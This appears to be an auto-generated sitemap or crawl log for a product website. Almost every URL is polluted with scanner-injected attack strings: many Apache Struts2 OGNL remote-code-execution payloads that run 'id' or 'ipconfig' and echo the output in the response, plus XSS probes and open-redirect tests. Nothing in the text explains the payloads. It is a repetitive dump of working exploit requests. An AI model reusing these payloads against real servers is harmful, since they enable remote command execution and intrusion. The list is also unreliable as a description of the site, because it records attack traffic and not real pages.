2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f=osm57461%ef%bf%bd%ef%bf%bdo1%ef%bf%bd%ef%bf%bdo2a%ef%bf%bdbcoem62832? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ubbxb 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2532%2539%2561 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f=%3c092257%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 